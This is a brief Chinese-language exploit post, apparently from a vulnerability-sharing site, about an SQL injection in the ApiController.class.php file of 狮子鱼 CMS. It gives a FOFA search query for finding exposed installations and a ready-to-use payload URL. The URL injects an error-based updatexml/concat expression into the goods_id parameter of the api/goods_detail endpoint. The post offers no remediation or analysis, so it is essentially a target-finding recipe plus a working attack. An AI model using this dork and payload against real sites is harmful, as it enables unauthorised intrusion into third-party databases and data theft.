獅子魚CMS_ApiController.class.php_SQL注入漏洞-棉花糖会员站

獅子魚CMS_ApiController.class.php_SQL注入漏洞

2021年7月15日发布

020

# 獅子魚CMS ApiController.class.php SQL注入漏洞
==FOFA==

"/seller.php?s=/Public/login"

==Payload==

https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容